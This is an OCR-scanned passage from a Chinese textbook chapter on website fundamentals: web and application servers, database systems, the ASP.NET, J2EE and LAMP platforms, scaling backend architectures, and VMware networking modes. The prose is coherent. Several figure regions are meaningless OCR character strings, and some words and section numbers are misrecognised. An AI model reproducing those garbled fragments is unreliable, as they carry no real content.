(5) PHP 应 用 服务 器 将 从 数据 库 返 回 的 查询 数据 或 操作 结果 进行 整理 ,将 其 形成 一 
种 表格 的 形式 , 总 之 还 是 最 终 将 PHP 代码 翻译 成 HTML、JavaScript 代码 ,返回 给 
Apache 服务 器 。 

(6) Apache 服务 器 将 PHP 应 用 服务 器 返回 的 index. php 页 面 处 理 之 后 相应 生成 的 
HTML JavaScript 代码 返回 给 客户 端 。 

(7) 客户 端 浏览 器 接收 到 HTTP 响应 后 ,解释 执行 HTML .JavaScript 代码 ,翻译 成 
精美 的 页 面 显示 出 来 ,这 样 用 户 就 看 到 了 动态 网 页 的 查询 结果 。 

这 就 是 网 站 最 基本 的 原理 ,用 户 不 管 是 访问 静态 网 页 还 是 动态 网 页 ,最 终 返回 到 客户 
端 浏览 器 的 一 定 是 由 HTML、JavaScript、CSS 等 代码 组 成 的 静态 网 页 ,因为 浏览 器 只 能 
够 解释 执行 这 些 静 态 网 页 代码 ,并 将 其 翻译 成 人 们 所 看 到 的 网 页 。 


ns 网 站 组 成 结构 


要 想 将 一 台 机 器 作为 网 站 服务 器 ,那么 必须 在 其 中 安装 Web 服务 器 软件 .应 用 服务 
器 软件 ,如 果 该 网 站 涉及 数据 库 操 作 , 则 还 要 安装 数据 库 管理 软件 。 其 中 Web 服务 器 和 
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应 用 服务 器 通常 安装 在 一 台 服 务 器 上 .而 数据 库 管理 软件 安装 到 数据 库 服 务 器 上 。 本 节 
将 简单 介绍 这 些 常见 的 服务 器 软件 及 网 站 运行 开发 平台 。 


13.1 Web 服务 软件 


如 今 互 联网 的 Web 平台 种 类 繁多 ,各 种 软 硬 件 组 合 的 Web 系统 更 是 数不胜数 ,在 
UNIX 和 Linux 平台 下 使 用 最 广泛 的 是 开源 的 HTTP 服务 器 Apache, 而 Windows 平台 
NT/2000/2003 使 用 IIS 的 Web 服务 器 。 在 选择 使 用 Web 服务 软件 时 ,程序 员 通 常 要 考 
虑 服务 平台 本 身 特性 因素 ,如 性 能 ,安全 性 ,日 志和 统计 、 虚 拟 主机 ,代理 服务 器 ,缓冲 服务 
和 集成 应 用 程序 等 。 


1.IS 

互联 网 信息 服务 (Internet Information Server,IIS) 是 微软 公司 主推 的 服务 器 ,其 中 
包括 Web 服务 器 .FTP 服务 器 .NNTP 服务 器 和 SMTP 服务 器 ,分 别 用 于 网 页 浏览 文件 
传输 .新 闻 服 务 和 邮件 发 送 等 方面 。 它 提供 ISAPI(intranet Server API) 作为 扩展 Web 
服务 器 功能 的 编程 接口 ;同时 , 它 还 提供 一 个 Internet 数据 库 连 接 器 ,可 以 实现 对 数据 库 
的 查询 和 更 新 。IIS 与 Windows Server 集成 在 一 起 ,用 户 能 够 利用 Windows Server 和 
NTFS 内 和 置 的 安全 特性 ,建立 强大 、 灵 活 而 安全 的 Internet 站 点 ,因此 IIS 也 成 为 目前 最 
流行 的 Web 服务 器 产品 之 一 。IIS 提供 了 一 个 图 形 界面 的 管理 工具 , 称 为 Internet 服务 
管理 器 ,可 用 于 监视 配置 和 控制 Internet 服务 。 目 前 IIS 最 新 版 本 是 7.0, 支 持 的 
Windows 版 本 包括 Windows Vista、Windows Server 2008 和 Windows 7。 它 具有 以 下 特 
点 ， 

(1) IIS 通过 超 文 本 传输 协议 (HTTP) 传 输 信息 ,还 可 配置 IIS 以 提供 文件 传输 协议 
(FTP) 和 其 他 服务 ,如 NNTP 服务 .SMTP 服务 等 。 

(2) IIS 的 设计 目标 是 提供 适应 性 强 的 Internet 和 intranet 服务 器 功能 。 通 过 围绕 
Windows NT 操作 系统 所 作 的 优化 ,使 IIS 具有 相当 高 的 执行 效率 、 出 色 的 安全 保密 性 
能 ,以 及 启动 迅速 和 易于 管理 等 特点 。 

(3) IIS 还 有 一 个 优势 是 只 为 一 种 操作 系统 平台 进行 优化 ,由 于 不 需要 考虑 可 移植 性 
问题 ,因而 其 性 能 的 优化 就 更 为 有 效 。 此 外 ,借助 Windows NT 的 负载 平衡 服务 可 以 很 
容易 地 建立 一 个 服务 器 集群 ,从 而 实现 将 负载 均衡 地 分 散 到 集群 内 的 各 个 服务 器 上 。 

(4) IIS 提供 了 一 套 完整 的 .易于 使 用 的 Web 站 点 架设 方案 ,除了 可 用 来 架设 站 点 的 
Web 服务 器 外 ,还 集成 了 用 于 文件 传输 的 FTP 服务 器 软件 和 用 于 邮件 发 送 的 SMTP 服 
务 器 软件 ,因而 是 一 个 多 功能 的 互联 网 服务 器 软件 。 

(5) IIS 提 供 了 ASP(Active Server Pages) 动 态 网 页 设计 技术 。 使 用 ASP 可 以 综合 
HTML 语言 和 VBScript JavaScript 等 多 种 脚本 语言 ,而 且 可 以 使 用 COM 组件 追 寻 动 态 
交互 式 网 页 和 功能 强大 的 Web 应 用 程序 。 


2. Apache 

Apache 是 世界 排名 第 一 的 Web 服务 器 , 根据 调查 ,世界 上 50% 以 上 的 Web 服务 器 
在 使 用 Apache。1995 年 4 月, 最早 的 Apache 由 Apache Group 公司 公布 发 行 ,Apache 
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Group 是 一 个 完全 通过 Internet 进行 运作 的 非 鱼 利 机 构 ， 由 它 来 决定 Apache Web 服务 
器 的 标准 发 行 版 中 应 该 包含 哪些 内 容 , 它 准许 任何 人 修改 隐 错 ,提供 新 的 特征 和 将 它 移植 
到 新 的 平台 上 ,以 及 其 他 的 工作 。 当 新 的 代码 被 提交 给 Apache Group 时 , 该 团体 审核 它 
的 具体 内 容 , 进 行 测试 ,如 果 认 为 满意 ,该 代码 就 会 被 集成 到 Apache 的 主要 发 行 版 中 。 
目前 Apache 最 新 的 版 本 为 2.2.15, 它 可 以 运行 在 几乎 所 有 广泛 使 用 的 计算 机 平台 上 ,由 
于 其 跨 平台 和 安全 性 被 广泛 使 用 。 


3. Tomcat 

Tomcat 是 Apache 软件 基金 会 的 Jakarta 项 目 中 的 一 个 核心 项 目 , 由 Apache、Sun 和 
其 他 一 些 公司 及 个 人 共同 开发 而 成 。 由 于 有 了 Sun 公司 的 参与 和 支持 ,最 新 的 Servlet 
和 JSP 规范 总 是 能 在 Tomcat 中 得 到 体现 。Tomcat 很 受 广大 程序 员 的 喜欢 ,因为 它 具 有 
运行 时 占用 的 系统 资源 小 ,扩展 性 好 ,支持 负载 平衡 与 邮件 服务 等 开发 应 用 系统 常用 的 功 
能 ;而 且 它 还 在 不 断 的 改进 和 完善 中 ,任何 一 个 感 兴趣 的 程序 员 都 可 以 更 改 它 或 在 其 中 加 
和 新 的 功能 。Tomcat 是 一 个 轻 量 级 应 用 服务 器 ,在 中 小 型 系统 和 并 发 访问 用 户 不 是 很 
多 的 场合 下 被 普遍 使 用 ,是 开发 和 调试 JSP 程序 的 首选 。 实 际 上 ,Tomcat 是 Apache 服 
务 器 的 扩展 ,是 独立 运行 的 ,所 以 当 运 行 Tomcat 时 , 它 实 际 上 作为 一 个 与 Apache 独立 的 
进程 单独 运行 的 。Tomcat 和 IIS、Apache 等 Web 服务 器 一 样 ,具有 人 处理 HTML 页 面 的 
功能 ,另外 它 还 是 一 个 Servlet 和 JSP 容器 。Tomcat 处 理 静 态 HTML 的 能 力 不 如 
Apache 服务 器 。 目 前 Tomcat 最 新 版 本 为 7.0.25 Released ,具有 新 特性 如 下 : 

(1) 使 用 随机 数 去 防止 跨 站 脚本 攻击 。 

(2) 改变 了 安全 认证 中 的 jessionid 的 机 制 ,防止 session 攻击 。 

(3) 内 存 泄露 的 侦 测 和 防止 。 

(4) 在 war 文件 外 使 用 别名 去 存储 静态 内 容 。 


132 应 用 服务 软件 


应 用 服务 软件 主要 是 用 来 解析 后 台 程 序 的 软件 ,如 解析 ASP、JSP 及 PHP 文件。 通 
常 应 用 服务 软件 不 单独 存在 ,其 作为 一 个 模块 与 Web 服务 软件 整合 到 一 起 。 有 些 在 安装 网 
站 服务 软件 的 同时 就 安装 了 应 用 服务 软件 ,如 IIS6.0, 在 后 面 章节 中 会 介绍 在 安装 完 服务 
软件 后 ,要 单独 开启 Active Server Pages 扩展 选项 ,才能 够 解释 执行 ASP 文件 ,如 图 1-5 
所 示 。 


133 数据 库 管 理 软件 


数据 库 管理 系统 (Database Management System,DBMS) 是 一 种 操纵 和 管理 数据 库 
的 大 型 软件 ,用 于 建立 .使 用 和 维护 数据 库 。 它 对 数据 库 进行 统一 的 管理 和 控制 ,以 保证 
数据 库 的 安全 性 和 完整 性 。 用 户 通 过 DBMS 访问 数据 库 中 的 数据 ,数据 库 管理 员 也 通过 
DBMS 进行 数据 库 的 维护 工作 。 它 可 使 多 个 应 用 程序 和 用 户 用 不 同 的 方法 去 建立 ,修改 
和 询问 数据 库 。 在 网 站 系统 中 ,常见 的 数据 库 管理 软件 有 以 下 几 种 。 


1. Access 
Access 是 微软 公司 推出 的 基于 Windows 的 桌面 关系 数据 库 管理 系统 ,是 Office 系 
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辐 文 件 四 “操作 @ 查看 中。 窗口 如 ” 必 助 史 | 三 可 到 
所 守 | 白 国 | 国 固 图 | 国 | 明 | 》 1 


由 -为 应 用 程序 池 7 | Weab 
日 -局 网 站 加 | 也 所 有 未 知 ISAFI 扩展 禁止 
名 和 人 克 诈 可 所 有 未 知 ccT 扩展 


莱 上 加 Teernet 下 所 这 按 吕 
属性 加 YebDAy 禁止 
固 在 服务 器 端的 包 全 文件 禁止 


加 添加 一 个 新 的 Yeb 服务 扩展 
加 对 特定 的 应 用 程序 允许 所 有 
Web 服务 扩展 

加 禁止 所 有 Web 服务 扩展 


傅 打开 和 帮 助 -| 
4 到 \ 扩 展 


| 
图 1-5 “Internet 信息 服务 管理 器 ?窗口 


列 应 用 软件 之 一 。Access 数据 库 以 文件 形式 保存 ,文件 的 扩展 名 是 MDB。 它 最 大 的 优点 
就 是 界面 友好 、 易 操作 。 缺 点 如 下 : 

(1) 每 个 数据 库 文件 最 大 限制 只 有 2GB, 一 般 Access 数据 库 达 到 50MB 左右 的 时 候 
性 能 会 急剧 下 降 。 

(2) 网 站 访问 频繁 ,经 常 达到 100 人 左右 的 在 线 同时 访问 就 能 导致 MDB 文件 损坏 。 

(3) 记录 数 过 多 ,一 般 记录 数 达 到 10 万 条 左右 的 时 候 性 能 就 会 急剧 下 降 。 


因此 ,Access 只 在 早期 用 于 制作 小 型 网 站 的 后 台数 据 库 ,对 于 中 大 型 网 站 显然 不 能 
够 胜任 。 
2. SQL Server 


SQL Server 是 由 微软 公司 开发 和 推广 的 关系 数据 库 管 理 系统 ,最 初 是 由 微软 、 
Sybase 和 Ashton-Tate 三 家 公司 共同 开发 的 ,并 于 1988 年 推出 了 第 一 个 OS/2 版 本 。 
Microsoft SQL Server 近年 来 不 断 更 新 版 本 ,1996 年 ,微软 公司 推出 了 SQL Server 6. 5 
版 本 ;1998 年 ,SQL Server 7.0 版 本 和 用 户 见 面 ;SQL Server 2000 是 微软 公司 于 2000 年 
推出 ,目前 最 新 版 本 是 2012 年 3 月 份 推出 的 SQL Server 2012。SQL Server 无 论 在 功能 
或 管理 上 都 比 Access 要 强 得 多 。 在 处 理 海量 数据 的 效率 ,后 台 开发 的 灵活 性 及 可 扩展 性 
等 方面 强大 ,近年 来 在 许多 企业 的 高 端 服务 器 上 得 到 了 广泛 的 应 用 。 


3. MSQ 软件 概述 
MySQL 是 一 个 小 型 关系 型 数据 库 管 理 系 统 , 开 发 者 为 瑞典 MySQL AB 公司 。 该 公 
司 在 2008 年 1 月 16 号 被 Sun 公司 收购 。 目 前 MySQL 被 广泛 地 应 用 在 Internet 上 的 中 
小 型 网 站 中 。 由 于 其 体积 小 .速度 快 . 总 体 拥 有 成 本 低 .尤其 是 开放 源码 这 一 特点 ,许多 中 
小 型 网 站 为 了 降低 网 站 总 体 拥 有 成 本 而 选择 了 MySQL 作为 网 站 数据 库 , 该 软件 同样 可 
以 处 理 拥有 上 千 万 条 记录 的 数据 库 。 
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4. DB2 

DB2 是 IBM 公司 开发 的 一 种 大 型 关系 型 数据 库 平台 。 它 支持 多 用 户 或 应 用 程序 在 
同一 条 SQL 语句 中 查询 不 同 数 据 库 甚至 不 同 DBMS 中 的 数据 。 在 全 球 500 强 的 企业 中 
有 80% 是 用 DB2 作为 数据 库 平台 ,其 可 以 运行 于 多 种 操作 系统 之 上 ,支持 从 PC 到 
UNIX, 从 中 小 型 机 到 大 型 机 ,从 IBM 到 非 [BM(HP 及 Sun UNIX 系统 等 ) 的 各 种 操作 平 
台 。DB2 系统 在 企业 级 的 应 用 中 十 分 广泛 ,目前 全 球 DB2 系统 用 户 超过 6000 万 ,分 布 于 
约 40 万 家 公司 。 

DB2 数据 库 核 心 采用 多 进程 多 线程 体系 结构 ,可 以 运行 于 多 种 操作 系统 之 上 ,并 分 
别 根 据 相 应 平台 环境 作 了 调整 和 优化 ,以 便 能 够 达到 较 好 的 性 能 。 


5. Oracle 

Oracle 数据 库 系 统 是 美国 Oracle 公司 提供 的 以 分 布 式 数据 库 为 核心 的 一 组 软件 产 
品 , 是 目前 最 流行 的 客户 /服务 器 体系 结构 的 数据 库 之 一 。Oracle 公司 是 世界 上 数据 库 
软件 领域 的 第 一 大 厂商 。Oracle 号 称 是 世界 上 最 好 的 数据 库 系统 。Oracle 的 数据 库 产 
品 被 认为 是 运行 稳定 、 功 能 齐全 、 性 能 超群 的 贵族 产品 。 这 一 方面 反映 了 它 在 技术 方面 的 
领先 ; 另 一 方面 也 反映 了 它 在 价格 定位 上 更 着 重 于 大 型 的 企业 数据 库 领 域 。 对 于 数据 量 
大 、 事 务 处 理 繁忙 .安全 性 要 求 高 的 企业 ,Oracle 无 疑 是 比较 理想 的 选择 。 


134 主流 网 站 开发 平台 


网 站 开发 平台 比较 常用 的 有 ASP. NET、J2EE 和 LAMP 三 种 。ASP. NET 的 服务 器 
端 系统 是 使 用 的 微软 公司 的 Windows ,并 需要 安装 微软 公司 的 IIS 网 站 服务 器 ,数据库 管 
理 系统 通常 是 使 用 微软 公司 的 SQL Server, 而 服务 器 端 脚本 语言 则 是 使 用 微软 公司 的 
ASP 技术 ,就 是 ASP. NET 动态 网 站 软件 开发 平台 ;J2EE 的 服务 器 端 操作 系统 使 用 
UINX 操作 系统 上 安装 Tomcat 或 Weblogic 网 站 服务 器 ,数据 库 管理 系统 使 用 Oracle 数 
据 库 , 服 务 器 端 脚 本 编程 语言 使 用 Sun 公司 的 JSP 技术 ,就 是 J2EE 动态 网 站 软件 开发 平 
台 ;LAMP 的 服务 器 端 操作 系统 使 用 开源 的 系统 Linux, 在 Linux 操作 系统 上 安装 自由 软 
件 Apache 网 站 服务 器 ,数据 库 管理 系统 使 用 开源 的 MySQL 软件 ,服务 器 端 脚本 编程 语 
言 使 用 开源 软件 PHP 技术 ,就 是 LAMP 动态 网 站 开发 平台 。 


1. ASPNET 
ASP. NET 开发 架构 是 Windows Server 十 IIS 十 SQL Server 十 ASP 组 合 , 所 有 组 成 部 
分 都 是 基于 微软 的 产品 。 它 的 优点 是 兼容 性 比较 好 ,安装 和 使 用 比较 方便 ,不 需要 太 多 的 
配置 ;而 且 简 单 易学 ,拥有 很 大 的 用 户 群 ,也 有 大 量 的 学 习 文 档 ;还 有 就 是 开发 工具 强大 而 
多 样 , 易 用 、 简 单 、 人 性 化 。ASP. NET 也 有 很 多 不 足 , 由 于 Windows 操作 系统 本 身 存在 
着 问题 ,ASP. NET 平台 开发 的 网 站 软件 ,外 部 攻击 时 可 以 取得 很 高 的 权限 而 导致 网 站 瘫 
痪 或 数据 丢失 ;并且 无 法 实现 跨 操作 系统 的 应 用 ,也 不 能 完全 实现 企业 级 应 用 的 功能 ,不 
适合 开发 大 型 系统 ,而 且 Windows 和 SQL server 软件 的 价格 也 不 低 , 平 台 建 设 成 本 比 
较 高 。 
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也 J2EE 

J2EE 是 一 个 开放 的 、 基 于 标准 的 开发 和 部 署 的 平台 ,基于 Web、 以 服务 端 计 算 为 核 
心 ,模块 化 的 企业 应 用 。 由 Sun 公司 领导 着 J2EE 规范 和 标准 的 制定 ,但 同时 很 多 公司 如 
IBM、BEA 也 为 该 标准 的 制定 贡献 了 很 多 力量 。J2EE 开发 架构 是 UNIX 十 Tomcat 十 
Oracle 十 JSP 的 组 合 , 是 一 个 非常 强大 的 组 合 , 环 境 搭建 比较 复杂 ,同时 价格 也 不 菲 。Java 
的 框架 利于 大 型 的 协同 编程 开发 ,系统 易 维护 、 可 复 用 性 较 好 。 它 特别 适合 企业 级 应 用 系 
统 开发 ,功能 强大 ,但 要 难 学 得 多 ,另外 开发 速度 比较 慢 , 成 本 也 比较 高 ,不 适合 快速 开发 
和 对 成 本 要 求 比较 低 的 中 小 型 应 用 系统 。 


3. LAMP 

LAMP 是 Linux 十 Apache 十 MySQL 十 PHP 的 标准 缩写 。Linux 操作 系统 、 网 站 服 
务 器 Apache、 数 据 库 MySQL 和 PHP 程序 模块 的 连接 ,形成 一 个 网 站 数据 库 的 开发 平 
台 , 是 开源 免费 的 自由 软件 ,与 J2EE 架构 和 ASP. NET 架构 形成 了 三 足 易 立 的 竞争 之 
势 ,是 比较 受 欢迎 的 开源 软件 网 站 开发 平台 。LAMP 组 合 具 有 简易 性 、 低 成 本 、 高 安全 
性 、 开 发 速度 和 执行 灵活 等 特点 ,使 得 其 在 全 球 发 展 速度 较 快 ,应 用 较 广 , 越 来 越 多 的 企业 
将 平台 架构 在 LAMP 之 上 。 不 管 是 否 是 专业 人 士 , 皆 可 利用 LAMP 平台 工具 来 设计 和 
架设 网 站 及 开发 应 用 程序 。 


4. 三 种 平台 性 能 比较 
以 上 三 种 主流 网 站 开发 平台 性 能 比较 如 表 1-1 所 示 。 


表 1-1 三 种 网 站 开发 平台 性 能 


性 能 比较 LAMP J2EE ASP. NET 
运行 速度 较 快 快 快 
开发 速度 快 慢 快 
运行 耗损 一 般 较 小 较 大 

难 易 程度 简单 难 简单 
运行 平台 Linux/UINX/Windows 绝 大 多 数 平台 均 可 Windows 
扩展 性 好 好 较 差 
安全 性 好 好 较 差 

应 用 程度 较 广 较 广 较 广 
建设 成 本 非常 低 非常 高 高 


1.4 网 站 后 台 架 构 


网 站 后 台 架 构 主 要 指 由 Web 服务 器 、 应 用 服务 器 数据 库 、 存 储 、 监 控 设 备 等 组 成 的 
网 站 后 台 系统 。 
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141 初期 站 点 后 台 架 构 


早期 创建 的 个 人 站 点 ,访问 量 不 大 ,一 般 都 是 将 Web Server、 应 用 服务 器 、 数 据 库 部 
署 在 同一 台 物 理 服务 器 上 ,如 图 1-6 所 示 。 


142 数据 库 单独 部 署 


随 着 网 站 访问 量 的 不 断 增 加 ,网 站 的 后 台 架 构 也 必须 不 断 调 整 和 优化 ,考虑 到 数据 库 
的 负载 和 数据 的 重要 性 ,通常 将 数据 库 需 要 分 离 出 来 ,如 图 1-7 所 示 。 


了 


Web 服务 器 
App 服务 器 


二 Web 服务 器 
App 服务 器 DB 服务 器 
DB 服务 器 


图 二 6 时 期 个 人 站 点 后 全 架构 图 1-7 数据 库 单独 部 署 后 台 架 构 


数据 库 与 Web 服务 器 .应 用 服务 器 分 离 出 来 , 单 台 部 署 。 这 样 做 有 两 个 优点 : 

(1) 数据 库 服务 器 性 能 提高 ,不 再 和 Web 服务 器 .应 用 服务 器 抢占 资源 。 

(2) 平台 整体 安全 性 能 提高 ,一 方面 不 会 因为 一 台 服 务 器 宕 机 而 影响 所 有 服务 ,特别 
是 数据 库 服务 ; 另 一 方面 ,用 户 通过 浏览 器 访问 到 的 仅仅 是 Web 服务 器 ,不 会 直接 访问 到 
数据 库 服 务 器 ,从 而 间接 保证 了 数据 库 服务 器 内 的 数据 安全 。 


143 前 端 负载 均衡 部 署 


随 着 访问 量 的 不 断 增加 , 单 台 Web 服务 器 负载 会 加 大 ,甚至 有 宕 机 的 危险 ,所 以 需要 
在 前 端 增加 负载 均衡 器 ,实现 Web 服务 器 层 的 负载 均衡 ,缓解 压力 ,如 图 1-8 所 示 。 

通过 增加 Web 服务 器 并 用 负载 均衡 器 来 缓解 前 端的 Web 服务 器 和 应 用 服务 器 压 
力 , 而 且 为 了 保证 数据 库 的 绝对 安全 ,做 了 Master-Slave 主 从 备份 。 这 样 当 主 数据 库 宕 
机 之 后 ,从 数据 库 可 以 立即 启用 。 所 以 这 样 做 有 以 下 优点 : 

(1) 前 台 Web 服务 器 和 应 用 服务 器 压力 减少 .负载 均衡 器 分 流 负载 。 

(2) 后 端 数 据 库 安全 性 加 强 , 出 现 故 障 后 ,业务 可 以 很 快 切换 到 从 数据 库 上 。 
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负载 均衡 器 


Web 服务 器 
应 用 服务 器 


从 数据 库 服务 器 遇 


图 1-8 前 端 负载 均衡 部 署 后 台 架 构 


144 增加 缓存 及 数据 库 读 写 分 离 


随 着 访问 量 的 不 断 增 加 ,网 站 在 运行 过 程 中 会 发 现 整个 系统 的 读 写 比例 很 大 ,对 用 户 
而 言 , 读 操作 远 远 多 于 写 操作 。 因 此 ,可 进一步 改善 后 台 架 构 ,实现 数据 库 的 读 写 分 离 。 
通过 增加 数据 库 代理 实现 读 写 分 离 , 如 图 1-9 所 示 。 


负载 均衡 器 


Web 服务 器 
应 用 服务 器 


负载 均衡 器 


读 
主 数据 库 


l 


从 数据 库 中 


1-9 数据 库 读 写 分 离 后 台 架 构 
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考虑 到 读 写 比 例 大 的 特点 ,通过 增加 数据 库 代 理 以 及 主 从 模式 ,实现 读 写 分 离 , 所 有 
写 操作 在 主 数 据 库 上 进行 ,所 有 读 操作 在 其 他 从 数据 库 上 进行 ,这 样 做 有 以 下 优点 : 

(1) 缓解 单 台数 据 库 的 压力 ,减少 单 台数 据 库 的 负载 。 

(2) 增加 多 个 从 数据 库 , 当 主 数据 库 宕 机 之 后 ,可 以 很 快 切换 到 从 数据 库 上 ,减少 所 
有 数据 库 同时 宕 机 的 风险 。 

如 果 很 多 用 户 同时 访问 , 读 与 写 操作 比例 很 大 ,通过 在 Web 服务 器 层 上 增加 缓存 ,如 
可 以 缓存 css ,jpg 等 静态 文件 ,同样 可 以 提高 访问 速度 。 

大 型 网 站 系统 在 真正 运行 过 程 中 ,为 保证 服务 的 不 间断 性 ,排除 系统 出 现 单 点 故障 的 
概率 ,通常 在 架构 时 也 会 考虑 增加 一 些 负载 均衡 器 的 备用 设备 ,或 是 增设 备用 网 络 线路 ; 
或 直接 在 全 国 范围 内 各 个 大 的 网 站 中 心 节点 处 放置 镜像 站 点 ,来 保证 系统 的 高 可 用 性 。 


_ 丘 。 虚 拟 机 介绍 


为 方便 地 搭建 网 站 服务 器 平台 ,本 书 所 涉及 的 实验 环境 均 是 基于 虚拟 机 之 上 的 。 虚 
拟 机 指 通过 软件 模拟 .具有 完整 硬件 系统 功能 .运行 在 一 个 完全 隔离 环境 中 的 完整 计算 机 
系统 。 目 前 可 用 的 虚拟 机 软件 有 很 多 ,如 VMware Player、 VMware Workstation 、 
VirtualBox 等 。 本 书 实验 所 使 用 的 虚拟 机 软件 为 VMware Workstation5. 5. 3。 


15.1 联网 方式 


通过 虚拟 机 软件 可 以 在 一 台 计算 机 上 模拟 出 来 若干 台 PC, 每 台 PC 可 以 运行 单独 的 
操作 系统 而 互 不 干扰 ,可 以 实现 一 台 计 算 机 “同时 ”运行 几 个 操作 系统 ,还 可 以 将 这 几 个 操 
作 系 统 连 成 一 个 网 络 。 具 体 的 虚拟 机 联网 方式 有 以 下 几 种 。 


1. 桥接 方式 

这 种 方式 最 简单 ,直接 将 虚拟 网 卡 桥接 到 一 个 物理 网 卡 上 面 , 和 Linux 下 一 个 网 卡 绑 
定 两 个 不 同 地 址 类 似 , 实 际 上 是 将 网 卡 设置 为 混杂 模式 ,从 而 达到 侦 听 多 个 IP 的 能 力 。 

在 此 种 模式 下 ,虚拟 机 内 部 的 网 卡 ( 如 Linux 下 的 eth0) 直 接连 到 了 物理 网 卡 所 在 的 
网 络 上 ,可 以 想象 为 虚拟 机 和 Host 处 于 对 等 的 地 位 ,在 网 络 关系 上 是 平等 的 ,没有 谁 在 
谁 后 面 的 问题 。 使 用 这 种 方式 很 简单 ,但 由 于 无 法 对 虚拟 机 的 网 络 进行 控制 ,不 适合 用 于 
做 网 络 实验 。 


2. NAT 方 式 

这 种 方式 下 Host 内 部 出 现 了 一 个 虚拟 的 网 卡 vmnet8, 相 当 于 连接 到 内 网 的 网 卡 , 而 
虚拟 机 本 身 则 相当 于 运行 在 内 网 上 的 机 器 ,虚拟 机 内 的 网 卡 (eth0) 独 立 于 vmnet8。 在 这 
种 方式 下 ,VMware 自 带 的 dhcp 会 默认 地 加 载 到 vmnet8 界面 上 ,这 样 虚拟 机 就 可 以 使 
用 dhcp 服务 。 更 为 重要 的 是 ,VMware 自 带 了 NAT 服务 .提供 了 从 vmnet8 到 外 网 的 地 
址 转换 ,所 以 这 种 情况 是 一 个 实 实在 在 的 NAT 服务 器 在 运行 ,只 不 过 是 供 虚 拟 机 用 的 。 
很 显然 ,如 果 你 只 有 一 个 外 网 地 址 此 种 方式 很 合适 。 
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3. host-only 方 式 

这 是 最 为 灵活 的 联网 方式 ,在 host-only 联网 方式 下 虚拟 机 只 能 和 主机 进行 通信 访 
问 , 不 能 和 外 界 进行 联系 ,也 就 是 虚拟 机 和 主机 组 成 了 一 个 单独 的 网 络 , 因 此 适合 进行 各 
种 网 络 实验 。 具 体 的 设置 方法 如 下 : 

(1) 启动 本 机 VMnetl 网 卡 。 

选择 “网 上 邻居 ”图 标 , 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,弹出 “网 络 连接 ” 
窗口 如 图 1-10 所 示 。 选 择 VMware Network Adapter VMnetl 项 , 右 击 ,在 弹出 快捷 菜 


单 中 ,启用 该 网 卡 。 
文件 人 ”编辑 于) 查看 WW) 收藏 全 ) 工具 YI) 高 级 如 ”帮助 们 


2 全 月 搜索 应 文件 天 加 > 
址 0) 多 网 络 连 接 


今 ”LAN 或 高 速 Internet 


ts 2 无线 网 络 注 接 
W E 半 被 找 ‘ 接 上， 
St ; 多 | 


are Network A hare Network 


加 了 ee Adapter, WinetB 
sh nba a 主 括 


Viware Virtual Ethernet Adapter for Viinetl 


图 1-10 “网 络 连接 ”窗口 


(2) 查看 本 机 VMnetl 网 IP 地 址 信息 。 
单 击 “ 开 始 ” 按 钮 ,选择 “运行 ”, 输 入 cmd, 进 入 命令 行 操 作 窗 口 , 在 该 窗口 内 输入 


ipconfig 命令 查看 本 机 的 VMnetl 网 卡 的 IP 地 址 信息 如 图 1-11 所 示 。 


5 C\WINDOWS\system32\cmd.exe 


图 1-11 本 机 VMnetl 网 卡 IP 地 址 信息 


(3) 以 host-only 联网 方式 启动 Windows 2003 Server 虚拟 机 。 
@ 选择 “开始 ”一 “程序 ”VMware 一 VMware Workstation 命令 ,打开 VMware 


A 操作 界面 如 图 1-12 所 示 。 
@ 选择 “文件 ”一 “打开 ”命令 ,选择 已 创建 的 虚拟 机 文件 ,如 图 1-13 所 示 。 在 该 界面 


显示 已 选择 的 虚拟 机 文件 名 及 状态 等 信息 ,并 包含 “命令 ”和 “设备 ”两 个 选项 组 。 
16 
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国 vmware Workstation =|Ojx| 
| 文件 (E) 编辑 多 ) 查看 (W) 虚拟 机 (0D 分 组 (IT) 窗口 人 8 帮助 (H) 
| 日 WD 司 || 区 交配 | 而 回 因 | 器 图 


VMware Workstation 


en 人 


ee 


和 


图 1-12 VMware Workstation 操作 界面 


可 
| 文件 (E) 编辑 (E) 查看 (YW) 虚拟 机 (QD) 分 组 (T) 窗口 0@) 帮助 (H) 


ja | 古 加 加 | 器 加 


Yindons Server 2003 Enter 


Windows Server 2003 Enterprise Edition dns 


状态 : 电源 已 关闭 

客户 机 操作 系统 : Yindows Server 2003 Enterprise Edition 

配置 文件 : F:\Windows Server 2003 Enterprise Edition dns\Windows Server 2003 Enterprise 了 dition mx 
版 本 : 新 版 本 虚拟 机 - Vivare Workstation 5.5.3 

快照: first 


命令 设备 


区 ”局 动 该 虚拟 机 国内 存 384 MB 
入 编辑 虚拟 机 设置 是 硬盘 (SCSI 0:0) 
剖 克隆 该 虚 拆 机 鸳 CD-ROM (IDE 1:0) 正在 使 用 镜像 F:\win2003ser. . 


图 1-13 启动 “虚拟 机 ?界面 


@ 在 “设备 ”选项 组 中 ,双击 “以 太 网 ”项 ,弹出 如 图 1-14 所 示 的 对 话 框 , 选 择 host- 
only 联网 方式 。 

@ 在 “命令 ”选项 组 中 ,双击 “启动 该 虚拟 机 ”项 ,进入 Windows 2003 Servers 操作 系 
统 登 录 界 面 , 按 Ctrl 十 Alt 十 Insert 组 合 键 ,在 登录 窗口 中 输入 用 户 名 及 密码 ,进入 系统 。 

(4) 配置 Windows 2003 Server 虚拟 机 的 IP 地 址 ,使 该 虚拟 机 与 本 机 VMnetl 网 卡 
处 于 同一 网 段 。 具 体操 作 步 又 如 下 : 

Q@ 选择 “开始 "一 “控制 面板 ”网 络 连接 ”本 地 连接 ”命令 ,打开 * 本 地 连接 状态 ” 
对 话 框 , 单 击 “ 属 性 ”按钮 打开 “本 地 连接 属性 ”对 话 框 如 图 1-15 所 示 。 
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了 本 
第 规 “| 身份 验证 | 高 | 
连接 时 使 用 - 
By MD PCNET Fanily PCI Ethernet Adapter 
加 
三 设备 据守 一 一 一 一 一 一 一 一 一 一 一 一 
厂 已 连 接 们 
厅 打开 电源 时 演 接 ) 
网络 注 接 
人 桥接 @) : 直接 连接 到 物理 网 络 
个 IAT; 使 用 已 共享 的 主机 IF 地 址 安装 四 到 要 而 属性 色 ) 
全 kost-only: 和 主机 共享 一 个 私有 网 络 说 明 
上 自 定义 @， 指定 虚 所 网 络 A 城内。 它 提供 中 起 多 种 五 联网 络 
Me 了 RU 本 
厂 连接 后 在 通知 区 域 显示 图 标 @) 
We | ai | 
图 1-14 “网 络 适配器 ”对 话 框 图 1-15 “本 地 连接 属性 ?对 话 框 


